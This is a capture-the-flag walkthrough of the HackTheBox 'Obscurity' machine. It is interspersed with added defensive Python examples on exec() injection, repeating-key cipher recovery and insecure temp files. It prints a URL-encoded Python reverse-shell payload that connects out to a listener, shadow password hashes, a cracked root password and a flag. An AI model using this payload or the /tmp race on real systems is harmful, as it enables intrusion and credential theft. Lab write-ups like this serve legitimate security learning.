HackTheBox - ObSecurity
The Nmap scan showed the following ports open:
Final output:
Port 8080 gave the following information:
Roughly, it says that for security he wrote his own HTTP server in Python (I hate people like this).
Fuzzing for the SuperSecureServer.py script file found it located at:
kali@kali:~/go/bin$ ./ffuf -u http://10.10.10.168:8080/FUZZ/SuperSecureServer.py -w /usr/share/dirb/wordlists/common.txt
v1.1.0-git
________________________________________________
:: Method : GET
:: URL : http://10.10.10.168:8080/FUZZ/SuperSecureServer.py
:: Wordlist : FUZZ: /usr/share/dirb/wordlists/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
develop [Status: 200, Size: 5892, Words: 1806, Lines: 171]
:: Progress: [4614/4614] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:39] :: Errors: 0 ::
After about two hours of debugging, I found that line 141 allows Python code to be injected.
In the end I built a URL like this; luckily it didn't exceed the browser's URL length limit. Back in development I once saw a 100 MB file transferred URL-encoded... heh.
http://10.10.10.168:8080/';%20%20import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.231%22,1488));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%20%20output%20=%20'
Successfully got a shell back as www-data.
Inside /home/robert/ I found:
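The shape of the payload above (close a quote, run statements, reopen the quote) is what you get when a server builds Python source text with the request path pasted into it and then runs that text with exec(). The following is an added example, not the actual SuperSecureServer.py code: a constructed minimal version of that pattern beside a hardened handler that never turns input into code. The TEMPLATE string, the function names and the allow-list regex are assumptions; the probe only sets a flag so the effect is visible.

```python
import re
from urllib.parse import unquote

# Constructed template: stands in for whatever SuperSecureServer.py does on its line 141;
# the real source is not reproduced here.
TEMPLATE = "output = 'Document: {}'"


def vulnerable_handle(raw_path):
    """Builds Python source from the request path and exec()s it, so any quote in the
    path becomes code. Returns (output value, whether an injected statement ran)."""
    path = unquote(raw_path)
    scope = {}
    exec(TEMPLATE.format(path), scope)  # the defect: user input becomes program text
    return scope.get("output"), scope.get("injected", False)


# Allow-list for what a document path may look like (assumption, not the box's rule).
SAFE_PATH = re.compile(r"/[A-Za-z0-9._/-]*")


def safe_handle(raw_path):
    """Plain string building plus an allow-list on the path; nothing is ever exec()'d."""
    path = unquote(raw_path)
    if not SAFE_PATH.fullmatch(path) or ".." in path:
        raise ValueError("rejected path")
    return "Document: " + path, False


def demo():
    benign = "/index.html"
    # Constructed probe with the same quote-break shape as the write-up's URL,
    # but its only statement sets a flag in the exec scope.
    probe = "/';%20injected%20=%20True;%20output%20=%20'"
    results = {
        "vulnerable_benign": vulnerable_handle(benign),
        "vulnerable_probe": vulnerable_handle(probe),
        "safe_benign": safe_handle(benign),
    }
    try:
        safe_handle(probe)
        results["safe_probe"] = "accepted"
    except ValueError:
        results["safe_probe"] = "rejected"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The vulnerable handler returns an empty `output` and `injected == True` for the probe, because the path closed the string literal and the rest of it ran as statements; the hardened handler rejects the same path before any string is built, and even an accepted path is only ever data.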
drwxr-xr-x 7 robert robert 4096 Dec 2 09:53 .
drwxr-xr-x 3 root root 4096 Sep 24 2019 ..
lrwxrwxrwx 1 robert robert 9 Sep 28 2019 .bash_history -> /dev/null
-rw-r--r-- 1 robert robert 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 robert robert 3771 Apr 4 2018 .bashrc
drwxr-xr-x 2 root root 4096 Dec 2 09:47 BetterSSH
drwx------ 2 robert robert 4096 Oct 3 2019 .cache
-rw-rw-r-- 1 robert robert 94 Sep 26 2019 check.txt
drwxr-x--- 3 robert robert 4096 Dec 2 09:53 .config
drwx------ 3 robert robert 4096 Oct 3 2019 .gnupg
drwxrwxr-x 3 robert robert 4096 Oct 3 2019 .local
-rw-rw-r-- 1 robert robert 185 Oct 4 2019 out.txt
-rw-rw-r-- 1 robert robert 27 Oct 4 2019 passwordreminder.txt
-rw-r--r-- 1 robert robert 807 Apr 4 2018 .profile
-rwxrwxr-x 1 robert robert 2514 Oct 4 2019 SuperSecureCrypt.py
-rwx------ 1 robert robert 33 Sep 25 2019 user.txt
check.txt was encrypted and the result written to out.txt. I transferred both to my machine with nc and compared them byte by byte: the lengths were identical. So I wrote a simple Python program:

def encrypt(text, key):
    # Repeating-key addition modulo 255, matching the scheme of SuperSecureCrypt.py
    keylen = len(key)
    keyPos = 0
    encrypted = ""
    for x in text:
        keyChr = key[keyPos]
        newChr = ord(x)
        newChr = chr((newChr + ord(keyChr)) % 255)
        encrypted += newChr
        keyPos += 1
        keyPos = keyPos % keylen
    return encrypted


def decrypt(text, key):
    keylen = len(key)
    keyPos = 0
    decrypted = ""
    for x in text:
        keyChr = key[keyPos]
        newChr = ord(x)
        newChr = chr((newChr - ord(keyChr)) % 255)
        decrypted += newChr
        keyPos += 1
        keyPos = keyPos % keylen
    return decrypted


def decryptMain(out, check):
    # Known plaintext: ciphertext byte minus plaintext byte (mod 255) is the key byte at that position
    pos = 0
    keystream = ""
    for e in out:
        # the modulo keeps chr() from getting a negative value where the addition wrapped
        diff = (ord(out[pos]) - ord(check[pos])) % 255
        print(ord(out[pos]), end='\t')
        print(ord(check[pos]), end='\t')
        print(diff, end='\t')
        print(chr(diff), end='\t')
        keystream += chr(diff)
        print()
        pos += 1
    print(keystream)
    return keystream


if __name__ == "__main__":
    out = open("t1/out.txt", encoding='utf-8')
    check = open("t1/check.txt", encoding='utf-8')
    #encryptText = encrypt("ineedthekey", "thisiskey")
    #decodeText = decrypt(encryptText, "thisiskey")
    key = decryptMain(out.read(), check.read())
    print(key)
In short: the decimal value of each encrypted byte minus the decimal value of the corresponding plaintext byte gives a new value; convert those values back to characters and you have the key:
alexandrovichalexandrovichalexandrovichalexandrovichalexandrovichalexandrovichalexandrovichal
Getting the robert user
passwordreminder.txt has no matching plaintext, so you need this prerequisite (the key) for the game to continue; use the recovered key to decrypt that file:
python3.6 ./SuperSecureCrypt.py -d -i passwordreminder.txt -k alexandrovich -o /tmp/1.txt;cat /tmp/1.txt
The output is SecThruObsFTW.
Got user.txt, but obviously root is the real goal.
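The known-plaintext recovery described above, carried one step further: the recovered keystream repeats ("alexandrovichalexandrovich..."), and the step the write-up does by eye, reducing it to the single key "alexandrovich", can be done by finding the shortest period, after which the key is reused on a second file just as with passwordreminder.txt. This is an added example, not the write-up's or the box's own code; the plaintext, reminder text and key below are constructed stand-ins for check.txt/out.txt and passwordreminder.txt, and the function names are assumptions.

```python
def vig_encrypt(text, key):
    """Repeating-key addition modulo 255, the same scheme SuperSecureCrypt.py uses."""
    return "".join(chr((ord(c) + ord(key[i % len(key)])) % 255) for i, c in enumerate(text))


def vig_decrypt(text, key):
    return "".join(chr((ord(c) - ord(key[i % len(key)])) % 255) for i, c in enumerate(text))


def recover_keystream(ciphertext, plaintext):
    """ciphertext[i] - plaintext[i] (mod 255) is key[i mod keylen]; the modulo handles
    positions where the addition wrapped past 255 during encryption."""
    if len(ciphertext) != len(plaintext):
        raise ValueError("known-plaintext recovery needs texts of equal length")
    return "".join(chr((ord(c) - ord(p)) % 255) for c, p in zip(ciphertext, plaintext))


def shortest_period(s):
    """Smallest repeating unit of s: the shortest p with s[i] == s[i-p] for all i >= p.
    If the keystream is shorter than one full key, the whole keystream is returned."""
    n = len(s)
    for p in range(1, n + 1):
        if all(s[i] == s[i - p] for i in range(p, n)):
            return s[:p]
    return s


def demo():
    key = "alexandrovich"  # the key the write-up recovered; used here only to build sample data
    # Constructed plaintext standing in for check.txt (longer than one key period, so it repeats)
    plaintext = "Encrypting this file with the super secure crypt script; nobody can read it without the key now."
    ciphertext = vig_encrypt(plaintext, key)  # stands in for out.txt
    stream = recover_keystream(ciphertext, plaintext)  # "alexandrovichalexandrovich..."
    recovered = shortest_period(stream)
    # Constructed stand-in for passwordreminder.txt, encrypted under the same key
    reminder = vig_encrypt("constructed reminder text", key)
    return recovered, vig_decrypt(reminder, recovered)


if __name__ == "__main__":
    print(demo())
```

The period search is the part worth noting: a keystream recovered from a file longer than the key always shows the key repeated plus a partial tail, and taking the shortest period is what lets the same key decrypt a file for which no plaintext exists.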
robert@obscure:~$ cat user.txt
e4493782066b55fe2755708736ada2d7sf
Approach for root
This Python script can be run normally via sudo:
robert@obscure:/etc$ sudo -l
Matching Defaults entries for robert on obscure:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User robert may run the following commands on obscure:
(ALL) NOPASSWD: /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py
robert@obscure:/etc$ sudo /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py
Enter username: robert
Enter password: SecThruObsFTW
Authed!
robert@Obscure$ whoami
Output: robert
Reviewing the source shows that a temporary file is written to /tmp. If you are fast enough you can copy it out. Using the watch command, copy the temporary file to the parent directory:
robert@obscure:/tmp/SSH$ watch -n 0.1 -d cp * ../
robert@obscure:/tmp/SSH$ ls
robert@obscure:/tmp/SSH$ ls ../
1.txt shell.py systemd-private-ac6646370f9e4477886e7d9dbc1f7497-systemd-resolved.service-lKQoAD vmware-root_618-2697467179
nNQQZ8xv SSH systemd-private-ac6646370f9e4477886e7d9dbc1f7497-systemd-timesyncd.service-zztZA2
robert@obscure:/tmp/SSH$ cd ..
robert@obscure:/tmp$ ls -al
total 52
drwxrwxrwt 11 root root 4096 Apr 29 07:18 .
drwxr-xr-x 24 root root 4096 Oct 3 2019 ..
-rw-r--r-- 1 www-data www-data 14 Apr 29 05:51 1.txt
drwxrwxrwt 2 root root 4096 Apr 29 04:18 .font-unix
drwxrwxrwt 2 root root 4096 Apr 29 04:18 .ICE-unix
-rw-r--r-- 1 robert robert 249 Apr 29 07:18 nNQQZ8xv
-rw-r--r-- 1 www-data www-data 0 Apr 29 07:13 shell.py
drwxrwxr-x 2 robert robert 4096 Apr 29 07:18 SSH
drwx------ 3 root root 4096 Apr 29 04:18 systemd-private-ac6646370f9e4477886e7d9dbc1f7497-systemd-resolved.service-lKQoAD
drwx------ 3 root root 4096 Apr 29 04:18 systemd-private-ac6646370f9e4477886e7d9dbc1f7497-systemd-timesyncd.service-zztZA2
drwxrwxrwt 2 root root 4096 Apr 29 04:18 .Test-unix
drwx------ 2 root root 4096 Apr 29 04:18 vmware-root_618-2697467179
drwxrwxrwt 2 root root 4096 Apr 29 04:18 .X11-unix
drwxrwxrwt 2 root root 4096 Apr 29 04:18 .XIM-unix
robert@obscure:/tmp$ date
Wed Apr 29 07:18:38 UTC 2020
robert@obscure:/tmp$ cat nNQQZ8xv
root
$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1
18226
0
99999
7
robert
$6$fZZcDG7g$lfO35GcjUmNs3PSjroqNGZjH35gN4KjhHbQxvWO0XU.TCIHgavst7Lj8wLF/xQ21jYW5nD66aJsvQSP/y1zbH/
18163
0
99999
7
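The listing above shows why the race works: the staged file lands in /tmp as -rw-r--r-- robert robert, with a path anyone can read for as long as it exists. The following is an added example, not BetterSSH.py's code: the weak staging pattern reproduced with the permissions from the listing, beside a hardened version that creates the file exclusively with mode 0600 and unlinks it while it is still open, plus a small audit that lists world-readable files in a directory. Names and the sample contents are constructed.

```python
import os
import stat
import tempfile


def insecure_stage(directory, data):
    """Writes data to a world-readable file at a fixed path and returns the path (the pattern to avoid)."""
    path = os.path.join(directory, "staged.txt")  # constructed name
    with open(path, "w") as fh:
        fh.write(data)
    os.chmod(path, 0o644)  # make the listing's -rw-r--r-- explicit regardless of the process umask
    return path


def secure_stage(directory, data):
    """Creates the file with O_CREAT|O_EXCL and mode 0600 (what mkstemp does), unlinks it
    immediately so no path remains to copy, and returns (mode bits, link count) for inspection."""
    fd, path = tempfile.mkstemp(dir=directory)
    try:
        os.write(fd, data.encode())
        os.unlink(path)  # only our descriptor can still read the data
        st = os.fstat(fd)
        return stat.S_IMODE(st.st_mode), st.st_nlink
    finally:
        os.close(fd)


def world_readable(path):
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def audit_dir(directory):
    """Regular files in directory that others can read: the check to run against /tmp."""
    return sorted(
        name for name in os.listdir(directory)
        if os.path.isfile(os.path.join(directory, name))
        and world_readable(os.path.join(directory, name))
    )


def demo():
    with tempfile.TemporaryDirectory() as d:
        weak = insecure_stage(d, "constructed: not real shadow lines")
        weak_readable = world_readable(weak)
        exposed = audit_dir(d)
        os.unlink(weak)
        mode, nlink = secure_stage(d, "constructed")
        after = audit_dir(d)
    return weak_readable, exposed, mode, nlink, after


if __name__ == "__main__":
    print(demo())
```

The hardened version closes both halves of the race: the 0600 mode means a copy by another user fails even if the name is guessed, and unlinking while the descriptor is open means there is no name to guess in the first place. The real fix is of course not to put /etc/shadow contents in a temporary file at all.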
Finally, crack the hash with john to get root:
kali@kali:/tmp$ /usr/sbin/john --show ~/Desktop/obsercurity/passwd
root:mercedes:18226:0:99999:7:::
And a final screenshot: